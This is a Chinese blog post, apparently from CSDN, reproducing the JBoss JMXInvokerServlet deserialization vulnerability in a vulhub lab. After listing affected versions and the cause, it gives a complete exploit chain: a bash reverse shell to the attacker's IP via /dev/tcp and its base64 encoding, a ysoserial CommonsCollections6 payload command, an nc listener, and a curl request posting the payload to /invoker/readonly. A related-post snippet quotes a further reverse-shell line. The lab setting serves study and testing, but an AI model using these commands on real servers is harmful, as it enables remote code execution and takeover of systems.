Jboss JMXInvokerServlet-deserialization漏洞复现

最新推荐文章于 2024-08-06 22:22:16 发布
最新推荐文章于 2024-08-06 22:22:16 发布
阅读量449 收藏 2
点赞数 2
分类专栏: vulhub漏洞复现 文章标签: jboss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014536801/article/details/126782059
版权

Jboss JMXInvokerServlet-deserialization漏洞复现

影响范围

JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10
JBoss AS (Wildly) 6 and earlier
JBoss A-MQ 6.2.0
JBoss Fuse 6.2.0
JBoss SOA Platform (SOA-P) 5.3.1
JBoss Data Grid (JDG) 6.5.0
JBoss BRMS (BRMS) 6.1.0
JBoss BPMS (BPMS) 6.1.0
JBoss Data Virtualization (JDV) 6.1.0
JBoss Fuse Service Works (FSW) 6.0.0
JBoss Enterprise Web Server (EWS) 2.1,3.0

漏洞成因

JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。

漏洞利用

环境准备
名称IP
攻击机192.168.159.174
靶机192.168.159.129

首先输入以下命令进入vulhub里启动靶场,然后在攻击机里访问http://192.168.159.129:8080即可

cd vulhub-master/jboss/JMXInvokerServlet-deserialization
docker-compose up -d

image-20220908110234697

漏洞复现

首先准备好生成payload的工具:ysoserial.jar

然后准备好反弹shell的命令,需要对其进行base64加密

//反弹shell命令,注意替换为自己的
bash -i >& /dev/tcp/192.168.159.174/6666 0>&1
//base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1OS4xNzQvNjY2NiAwPiYx

java  -jar  ysoserial.jar  CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1OS4xNzQvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser

执行完上述命令会生成一个poc.ser文件,接下来新打开一个cmd窗口执行以下命令:

nc -lvvp 6666

监听启动后再执行下述指令:

curl http://192.168.159.129:8080/invoker/readonly --data-binary @poc.ser

可以看到如下图,反弹shell成功,此漏洞利用成功

image-20220908113311753

云舒_YunShu
关注
专栏目录
[ vulhub漏洞复现篇 ] Jboss_JMXInvokerServlet_Deserialization(反序列化)代码执行漏洞
qq_51577576的博客
09-15 1124
Jboss_JMXInvokerServlet_Deserialization代码执行漏洞漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞
【vulhub】JMXInvokerServlet-deserialization JBOOS 反序列化漏洞
weixin_42884199的博客
12-09 2378
前言 影响版本 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6.2.0 JBoss SOA Platform (SOA-P) 5.3.1 JBoss Data Grid (JDG) 6.5.0 JBoss BRMS (BRMS) 6.1.0 JBoss BPMS (BPMS) 6.1.0 JBoss Data V
Jboss】常见漏洞复现
最新发布
m0_59151303的博客
08-06 1161
JBoss是一个基于J2EE的开发源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
JBoss JMXInvokerServlet 反序列化漏洞复现
W小哥
05-26 1815
一、漏洞描述 影响范围 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6.2.0 JBoss SOA Platform (SOA-P) 5.3.1 JBoss Data Grid (JDG) 6.5.0 JBoss BRMS (BRMS) 6.1.0 JBoss BPMS (BPMS) 6.1.0 JBoss Da
利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞
qq_50854662的博客
09-17 629
JBoss JMXInvokerServlet 反序列化漏洞 Vulnhub官方复现教程漏洞原理 复现过程启动环境端口设置浏览器设置BurpSuit设置 复现漏洞序列化数据生成发送POCEXP Vulnhub官方复现教程 https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/ 漏洞原理 这是经典的JBoss反序列化漏洞JBoss在/invoker/JMXInvo..
JBoss JMXInvokerServlet 反序列化漏洞(CVE-2015-7501)
m0_49025459的博客
12-06 327
漏洞概述 JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,可以通过Apache Commons Collections中的Gadget执行任意代码。 影响范围 红帽 JBoss A-MQ 6.x;BPM 套件 (BPMS) 6.x;BRMS 6.x 和 5.x;数据网格(JDG)6.x;数据虚拟化 (JDV) 6.x 和 5.x;企业应用平台 6.x、5.x 和 4.3.x;保险丝 6.x; 保险丝维修工程 (FSW) 6.x;运营网络(JBoss ON)3.x;
jboss漏洞复现】CVE-2017-7504反序列化漏洞+CVE-2017-12149任意代码执行漏洞+JMXInvokerServlet-deserialization反序列化漏洞
serendipity1130的博客
08-31 980
CVE-2017-7504 Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 1.扫描开放了8080端口,访问8080端口: 2、利用工具选择一个Gadget:ExampleCommonsCollections1WithHashMap编译并生成序列化数据: javac -cp .:common
JBOSS远程代码执行漏洞
weixin_30439131的博客
01-08 402
JBOSS默认配置会有一个后台漏洞漏洞发生在jboss.deployment命名空间 中的addURL()函数,该函数可以远程下载一个war压缩包并解压 访问http://www.safe3.com.cn:8080/jmx-console/ 后台,如下图 下拉找到如下图所示 点击flavor=URL,type=DeploymentScanner进入 在输入...
JBoss JMXInvokerServlet 反序列化漏洞
weixin_42687904的博客
08-21 527
JBoss JMXInvokerServlet 反序列化漏洞(CVE-2017-12149) 记一次JBoss反序列化漏洞复现过程 如图,搭建一个JBoss环境 (备注:CVE-2017-12149适用JBoss版本:5.x / 6.x) 漏洞原理: 该漏洞出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化 编写反弹shell命令: bash -i >& /dev/tcp/192.168.10.100/21 0>&1 由于Run
如何修复JBoss EJBInvokerServlet / JMXInvokerServlet 漏洞
05-17 978
漏洞描述: EJBInvokerServletJMXInvokerServlet Servlet中存在一个远程执行代码漏洞。未经身份验证的远程攻击者可以通过特制请求利用此漏洞来安装任意应用程序。 https://192.168.xxx.22/invoker/EJBInvokerServlet https://192.168.xxx.22/invoker/JMXInvokerServlet ...
Jboss反序列化漏洞复现与原理
LJH1999ZN的博客
03-29 5024
一、什么是Jboss Jboss是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。 Jboss属于redhat公司,而且jboss是开源的,免费的,且在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器,所以曾经广为流行。 二、Jboss的历史漏洞 1.jboss反序列化漏洞,CVE-2017-7504 漏洞存在/jbossmq-httpi
JBoss服务器 /invoker/JMXInvokerServlet/ 接口对外开放
Mark
12-26 4091
JBoss服务器的/invoker/JMXInvokerServlet/接口对外开放,hacker通过此接口进行远程部署WebShell,可进一步对服务器进行控制。 文件上传导致任意代码执行 http://www.wooyun.org/bugs/wooyun-2010-031621
jboss中间件漏洞复现
mingyqf的博客
02-15 1458
参考:https://blog.csdn.net/cj_Allen/article/details/109522771 JBOSS简介 JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于J
JBoss 5.x/6.x 反序列化漏洞 CVE-2017-12149 漏洞复现
ADummy的博客
03-03 401
JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149) by ADummy 0x00利用路线 ​ ysoserial生成payload—>上传给网站进行解析—>命令执行 0x01漏洞介绍 ​ Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。 ​ 影
JBOSS安全配置
任何事都始于当初的选择
05-08 5421
JBOSS安全配置 思维导图: ![这里写图片描述](http://img.blog.csdn.net/20160508130618797)概念: JBoss应用服务器(JBoss AS)是一个被广泛使用的开源Java应用服务器。 它是JBoss企业中间件(JEMS)的一部分,并且经常在大型企业中使用。架构 JBoss的模块架构是建立在JMX底层上的。JMX是一个可复用框架,它为远程(Remote
JBoss7-配置管理员手册: 特性指南及版本介绍
本文是关于《JBoss7-配置管理员手册》的总结,针对该手册的内容进行详细描述,严格要求总字数为2000字。该手册讲述了JBoss7的配置和管理方面的知识。本文将按照手册的顺序,对每个章节的主要内容进行概括和总结。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值